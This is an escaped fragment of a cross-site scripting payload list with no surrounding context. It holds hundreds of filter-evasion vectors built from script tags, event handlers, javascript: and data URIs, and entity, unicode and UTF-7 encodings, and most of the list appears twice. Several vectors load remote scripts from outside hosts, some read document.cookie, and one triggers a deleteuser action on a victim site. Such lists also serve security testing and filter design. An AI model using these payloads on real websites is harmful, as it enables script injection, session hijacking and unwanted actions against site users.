aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\n<SCRIPT SRC=\\\"http://ha.ckers.org/xss.jpg\\\"></SCRIPT>\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\\\'\\\"-->\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>alert(\\\"XSS\\\")</SCRIPT>\\\'); ?>\\r\\n<IMG SRC=\\\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\">\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser\\r\\n<META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=<SCRIPT>alert(\\\'XSS\\\')</SCRIPT>\\\">\\r\\n <HEAD><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>+ADw-SCRIPT+AD4-alert(\\\'XSS\\\');+ADw-/SCRIPT+AD4-\\r\\n<SCRIPT a=\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT =\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT \\\"a=\\\'>\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=`>` SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT>document.write(\\\"<SCRI\\\");</SCRIPT>PT SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<A HREF=\\\"http://66.102.7.147/\\\">XSS</A>\\r\\n<A HREF=\\\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\">XSS</A>\\r\\n<A HREF=\\\"http://1113982867/\\\">XSS</A>\\r\\n<A HREF=\\\"http://0x42.0x0000066.0x7.0x93/\\\">XSS</A>\\r\\n<A HREF=\\\"http://0102.0146.0007.00000223/\\\">XSS</A>\\r\\n<A HREF=\\\"htt p://6 6.000146.0x7.147/\\\">XSS</A>\\r\\n<iframe %00 src=\\\"&Tab;javascript:prompt(1)&Tab;\\\"%00>\\r\\n<svg><style>{font-family&colon;\\\'<iframe/onload=confirm(1)>\\\'\\r\\n<input/onmouseover=\\\"javaSCRIPT&colon;confirm&lpar;1&rpar;\\\"\\r\\n<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}\\r\\n<img/src=`%00` onerror=this.onerror=confirm(1) \\r\\n<form><isindex formaction=\\\"javascript&colon;confirm(1)\\\"\\r\\n<img src=`%00`&NewLine; onerror=alert(1)&NewLine;\\r\\n<script/&Tab; src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' /&Tab;></script>\\r\\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\\r\\n<iframe/src=\\\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\">\\r\\n<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/\\r\\n&#34;&#62;<h1/onmouseover=\\\'\\\\u0061lert(1)\\\'>%00\\r\\n<iframe/src=\\\"data:text/html,<svg &#111;&#110;load=alert(1)>\\\">\\r\\n<meta content=\\\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\\\" http-equiv=\\\"refresh\\\"/>\\r\\n<svg><script xlink:href=data&colon;,window.open(\\\'https://www.google.com/\\\')></script\\r\\n<svg><script x:href=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' {Opera}\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=javascript:confirm(1)\\\">\\r\\n<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\\r\\n<form><a href=\\\"javascript:\\\\u0061lert&#x28;1&#x29;\\\">X\\r\\n</script><img/*%00/src=\\\"worksinchrome&colon;prompt&#x28;1&#x29;\\\"/%00*/onerror=\\\'eval(src)\\\'>\\r\\n<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\\r\\n<form><iframe &#09;&#10;&#11; src=\\\"javascript&#58;alert(1)\\\"&#11;&#10;&#09;;>\\r\\n<a href=\\\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&#09;&#10;&#11;>X</a\\r\\nhttp://www.google<script .com>alert(document.location)</script\\r\\n<a&#32;href&#61;&#91;&#00;&#93;\\\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\\\">XYZ</a\\r\\n<img/src=@&#32;&#13; onerror = prompt(\\\'&#49;\\\')\\r\\n<style/onload=prompt&#40;\\\'&#88;&#83;&#83;\\\'&#41;\\r\\n<script ^__^>alert(String.fromCharCode(49))</script ^__^\\r\\n</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\\r\\n&#00;</form><input type&#61;\\\"date\\\" onfocus=\\\"alert(1)\\\">\\r\\n<form><textarea &#13; onkeyup=\\\'\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&#x28;1&#x29;\\\'>\\r\\n<script /***/>/***/confirm(\\\'\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\')/***/</script /***/\\r\\n<iframe srcdoc=\\\'&lt;body onload=prompt&lpar;1&rpar;&gt;\\\'>\\r\\n<a href=\\\"javascript:void(0)\\\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\\r\\n<script ~~~>alert(0%0)</script ~~~>\\r\\n<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\\r\\n<///style///><span %2F onmousemove=\\\'alert&lpar;1&rpar;\\\'>SPAN\\r\\n<img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' onmouseover=&Tab;prompt(1)\\r\\n&#34;&#62;<svg><style>{-o-link-source&colon;\\\'<body/onload=confirm(1)>\\\'\\r\\n&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\\r\\n<marquee onstart=\\\'javascript:alert&#x28;1&#x29;\\\'>^__^\\r\\n<div/style=\\\"width:expression(confirm(1))\\\">X</div> {IE7}\\r\\n<iframe/%00/ src=javaSCRIPT&colon;alert(1)\\r\\n//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/onload=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ <script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'> //|\\\\\\\\ </script //|\\\\\\\\\\r\\n</font>/<svg><style>{src&#x3A;\\\'<style/onload=this.onload=confirm(1)>\\\'</font>/</style>\\r\\n<a/href=\\\"javascript:&#13; javascript:prompt(1)\\\"><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/onmouseover=prompt(1)\\r\\n</svg>\\\'\\\'<svg><script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'>alert&#x28;1&#x29; {Opera}\\r\\n<a href=\\\"javascript&colon;\\\\u0061&#x6C;&#101%72t&lpar;1&rpar;\\\"><button>\\r\\n<div onmouseover=\\\'alert&lpar;1&rpar;\\\'>DIV</div>\\r\\n<iframe style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\">\\r\\n<a href=\\\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\\\">X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var onmouseover=\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\\r\\n<img src=\\\"/\\\" =_=\\\" title=\\\"onerror=\\\'prompt(1)\\\'\\\">\\r\\n<%<!--\\\'%><script>alert(1);</script -->\\r\\n<script src=\\\"data:text/javascript,alert(1)\\\"></script>\\r\\n<iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n<iframe/onreadystatechange=alert(1)\\r\\n<svg/onload=alert(1)\\r\\n<input value=<><iframe/src=javascript:confirm(1)\\r\\n<input type=\\\"text\\\" value=`` <div/onmouseover=\\\'alert(1)\\\'>X</div>\\r\\nhttp://www.<script>alert(1)</script .com\\r\\n<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\\r\\n<svg><script ?>alert(1)\\r\\n<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\\r\\n<img src=`xx:xx`onerror=alert(1)>\\r\\n<object type=\\\"text/x-scriptlet\\\" data=\\\"http://jsfiddle.net/XLE63/ \\\"></object>\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;javascript&colon;alert(1)\\\"/>\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always>\\r\\n<svg contentScriptType=text/vbs><script>MsgBox+1\\r\\n<a href=\\\"data:text/html;base64_,<svg/onload=\\\\u0061&#x6C;&#101%72t(1)>\\\">X</a\\r\\n<iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\'\\\\u0061\\\') worksinIE>\\r\\n<script>~\\\'\\\\u0061\\\' ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\'\\\\u0061\\\')</script U+\\r\\n<script/src=\\\"data&colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\'\\\\u0061\\\')\\\"></script a=\\\\u0061 & /=%2F\\r\\n<script/src=data&colon;text/j\\\\u0061v\\\\u0061&#115&#99&#114&#105&#112&#116,\\\\u0061%6C%65%72%74(/XSS/)></script\\r\\n<object data=javascript&colon;\\\\u0061&#x6C;&#101%72t(1)>\\r\\n<script>+-+-1-+-+alert(1)</script>\\r\\n<body/onload=&lt;!--&gt;&#10alert(1)>\\r\\n<script itworksinallbrowsers>/*<script* */alert(1)</script\\r\\n<img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n<svg><script>//&NewLine;confirm(1);</script </svg>\\r\\n<svg><script onlypossibleinopera:-)> alert(1)\\r\\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\\r\\n<script x> alert(1) </script 1=2\\r\\n<div/onmouseover=\\\'alert(1)\\\'> style=\\\"x:\\\">\\r\\n<--`<img/src=` onerror=alert(1)> --!>\\r\\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\\r\\n<div style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\" onclick=\\\"alert(1)\\\">x</button>\\r\\n\\\"><img src=x onerror=window.open(\\\'https://www.google.com/\\\');>\\r\\n<form><button formaction=javascript&colon;alert(1)>CLICKME\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\"></iframe>\\r\\n<a href=\\\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\\\">Click Me</a>\\r\\n‘; alert(1);\\r\\n‘)alert(1);//\\r\\n<ScRiPt>alert(1)</sCriPt>\\r\\n<IMG SRC=jAVasCrIPt:alert(‘XSS’)>\\r\\n<IMG SRC=”javascript:alert(‘XSS’);”>\\r\\n<IMG SRC=javascript:alert(&quot;XSS&quot;)>\\r\\n<IMG SRC=javascript:alert(‘XSS’)> \\r\\n<img src=xss onerror=alert(1)>\\r\\n<iframe %00 src=\\\"&Tab;javascript:prompt(1)&Tab;\\\"%00>\\r\\n<svg><style>{font-family&colon;\\\'<iframe/onload=confirm(1)>\\\'\\r\\n<input/onmouseover=\\\"javaSCRIPT&colon;confirm&lpar;1&rpar;\\\"\\r\\n<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}\\r\\n<img/src=`%00` onerror=this.onerror=confirm(1)\\r\\n<form><isindex formaction=\\\"javascript&colon;confirm(1)\\\"\\r\\n<img src=`%00`&NewLine; onerror=alert(1)&NewLine;\\r\\n<script/&Tab; src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' /&Tab;></script>\\r\\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\\r\\n<iframe/src=\\\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\">\\r\\n<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/\\r\\n&#34;&#62;<h1/onmouseover=\\\'\\\\u0061lert(1)\\\'>%00\\r\\n<iframe/src=\\\"data:text/html,<svg &#111;&#110;load=alert(1)>\\\">\\r\\n<meta content=\\\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\\\" http-equiv=\\\"refresh\\\"/>\\r\\n<svg><script xlink:href=data&colon;,window.open(\\\'https://www.google.com/\\\')></script\\r\\n<svg><script x:href=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' {Opera}\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=javascript:confirm(1)\\\">\\r\\n<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\\r\\n<form><a href=\\\"javascript:\\\\u0061lert&#x28;1&#x29;\\\">X\\r\\n</script><img/*%00/src=\\\"worksinchrome&colon;prompt&#x28;1&#x29;\\\"/%00*/onerror=\\\'eval(src)\\\'>\\r\\n<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\\r\\n<form><iframe &#09;&#10;&#11; src=\\\"javascript&#58;alert(1)\\\"&#11;&#10;&#09;;>\\r\\n<a href=\\\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&#09;&#10;&#11;>X</a\\r\\nhttp://www.google<script .com>alert(document.location)</script\\r\\n<a&#32;href&#61;&#91;&#00;&#93;\\\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\\\">XYZ</a\\r\\n<img/src=@&#32;&#13; onerror = prompt(\\\'&#49;\\\')\\r\\n<style/onload=prompt&#40;\\\'&#88;&#83;&#83;\\\'&#41;\\r\\n<script ^__^>alert(String.fromCharCode(49))</script ^__^\\r\\n</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\\r\\n&#00;</form><input type&#61;\\\"date\\\" onfocus=\\\"alert(1)\\\">\\r\\n<form><textarea &#13; onkeyup=\\\'\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&#x28;1&#x29;\\\'>\\r\\n<script /***/>/***/confirm(\\\'\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\')/***/</script /***/\\r\\n<iframe srcdoc=\\\'&lt;body onload=prompt&lpar;1&rpar;&gt;\\\'>\\r\\n<a href=\\\"javascript:void(0)\\\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\\r\\n<script ~~~>alert(0%0)</script ~~~>\\r\\n<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\\r\\n<///style///><span %2F onmousemove=\\\'alert&lpar;1&rpar;\\\'>SPAN\\r\\n<img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' onmouseover=&Tab;prompt(1)\\r\\n&#34;&#62;<svg><style>{-o-link-source&colon;\\\'<body/onload=confirm(1)>\\\'\\r\\n&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\\r\\n<marquee onstart=\\\'javascript:alert&#x28;1&#x29;\\\'>^__^\\r\\n<div/style=\\\"width:expression(confirm(1))\\\">X</div> {IE7}\\r\\n<iframe/%00/ src=javaSCRIPT&colon;alert(1)\\r\\n//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/onload=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ <script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'> //|\\\\\\\\ </script //|\\\\\\\\\\r\\n</font>/<svg><style>{src&#x3A;\\\'<style/onload=this.onload=confirm(1)>\\\'</font>/</style>\\r\\n<a/href=\\\"javascript:&#13; javascript:prompt(1)\\\"><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/onmouseover=prompt(1)\\r\\n</svg>\\\'\\\'<svg><script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'>alert&#x28;1&#x29; {Opera}\\r\\n<a href=\\\"javascript&colon;\\\\u0061&#x6C;&#101%72t&lpar;1&rpar;\\\"><button>\\r\\n<div onmouseover=\\\'alert&lpar;1&rpar;\\\'>DIV</div>\\r\\n<iframe style=\\\"xg-p:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\">\\r\\n<a href=\\\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\\\">X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var onmouseover=\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\\r\\n<img src=\\\"/\\\" =_=\\\" title=\\\"onerror=\\\'prompt(1)\\\'\\\">\\r\\n<%<!--\\\'%><script>alert(1);</script -->\\r\\n<script src=\\\"data:text/javascript,alert(1)\\\"></script>\\r\\n<iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n<iframe/onreadystatechange=alert(1)\\r\\n<svg/onload=alert(1)\\r\\n<input value=<><iframe/src=javascript:confirm(1)\\r\\n<input type=\\\"text\\\" value=`` <div/onmouseover=\\\'alert(1)\\\'>X</div>\\r\\nhttp://www.<script>alert(1)</script .com\\r\\n<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\\r\\n<svg><script ?>alert(1)\\r\\n<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\\r\\n<img src=`xx:xx`onerror=alert(1)>\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;javascript&colon;alert(1)\\\"/>\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always>\\r\\n<svg contentScriptType=text/vbs><script>MsgBox+1\\r\\n<a href=\\\"data:text/html;base64_,<svg/onload=\\\\u0061&#x6C;&#101%72t(1)>\\\">X</a\\r\\n<iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\'\\\\u0061\\\') worksinIE>\\r\\n<script>~\\\'\\\\u0061\\\' ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\'\\\\u0061\\\')</script U+\\r\\n<script/src=\\\"data&colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\'\\\\u0061\\\')\\\"></script a=\\\\u0061 & /=%2F\\r\\n<script/src=data&colon;text/j\\\\u0061v\\\\u0061&#115&#99&#114&#105&#112&#116,\\\\u0061%6C%65%72%74(/XSS/)></script\\r\\n<object data=javascript&colon;\\\\u0061&#x6C;&#101%72t(1)>\\r\\n<script>+-+-1-+-+alert(1)</script>\\r\\n<body/onload=&lt;!--&gt;&#10alert(1)>\\r\\n<script itworksinallbrowsers>/*<script* */alert(1)</script\\r\\n<img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n<svg><script>//&NewLine;confirm(1);</script </svg>\\r\\n<svg><script onlypossibleinopera:-)> alert(1)\\r\\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\\r\\n<script x> alert(1) </script 1=2\\r\\n<div/onmouseover=\\\'alert(1)\\\'> style=\\\"x:\\\">\\r\\n<--`<img/src=` onerror=alert(1)> --!>\\r\\n <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\\r\\n<div style=\\\"xg-p:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\" onclick=\\\"alert(1)\\\">x</button>\\r\\n\\\"><img src=x onerror=window.open(\\\'https://www.google.com/\\\');>\\r\\n<form><button formaction=javascript&colon;alert(1)>CLICKME\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\"></iframe>\\r\\n<a href=\\\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\\\">Click Me</a>\\r\\n<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>\\r\\n‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\\r\\n<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>\\r\\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\\r\\n<IMG SRC=”jav ascript:alert(‘XSS’);”>\\r\\n<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>\\r\\n<<SCRIPT>alert(“XSS”);//<</SCRIPT>\\r\\n%253cscript%253ealert(1)%253c/script%253e\\r\\n“><s”%2b”cript>alert(document.cookie)</script>\\r\\nfoo<script>alert(1)</script>\\r\\n<scr<script>ipt>alert(1)</scr</script>ipt>\\r\\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\\r\\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\\r\\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\\r\\n<BODY BACKGROUND=”javascript:alert(‘XSS’)”>\\r\\n<BODY ONLOAD=alert(‘XSS’)>\\r\\n<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>\\r\\n<IMG SRC=”javascript:alert(‘XSS’)”\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html <\\r\\njavascript:alert(\\\"hellox worldss\\\")\\r\\n<img src=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<img 